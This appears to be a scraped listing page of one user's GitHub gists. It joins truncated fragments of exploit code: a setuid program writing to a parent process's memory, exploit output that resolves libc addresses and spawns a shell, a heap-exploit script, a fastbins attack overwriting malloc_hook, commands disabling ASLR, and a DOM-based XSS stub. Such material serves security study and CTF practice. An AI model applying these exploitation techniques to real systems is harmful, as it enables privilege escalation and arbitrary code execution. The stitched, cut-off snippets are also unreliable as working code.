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inaz2 / write_ppid_memory.c
Created January 4, 2017 05:38
write memory of the parent process via /proc/$PPID/mem
$ gcc write_ppid_memory.c -o write_ppid_memory
$ sudo chown root write_ppid_memory
$ sudo chmod u+s write_ppid_memory
$ ls -al
-rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory*
-rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c
$ python
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
from minipwn import *
def add_user(s, size_desc, name, text_len, text):
recvuntil(s, 'Action: ')
sendline(s, '0')
recvuntil(s, 'size of description: ')
sendline(s, str(size_desc))
recvuntil(s, 'name: ')
sendline(s, name)
recvuntil(s, 'text length: ')
inaz2 /
Last active January 16, 2021 14:21
angr example of input handling
$ gcc test.c
$ python
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior.
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 1) setting a value to the initial state
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY_REGISTERS}, to suppress these messages.
WARNING | 2019-05-06 19:54:00,018 | angr.state_plugins.symbolic_memory | Filling register r15 with 8 unconstrained bytes referenced from 0x810 (__libc_csu_
$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
$ ./a.out
Segmentation fault (core dumped)
data = open('./warp-speed.jpg').read()
# replace (height, width): (250, 1000) -> (500, 500)
data = data.replace('\x00\xfa\x03\xe8', '\x01\xf4\x01\xf4')
print data
$ python | file -
/dev/stdin: GIF image data, version 89a, 512 x 316
inaz2 / fastbins_malloc_hook.c
Last active January 6, 2020 12:05
overwrite malloc_hook by fastbins unlink attack
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void jackpot() { puts("jackpot!"); }
int main()
puts("[+] allocate p1, p2");
char *p1 = malloc(0x100);
inaz2 / test.html
Created October 19, 2016 05:41
DOM-based XSS with JQuery
<script src=""></script>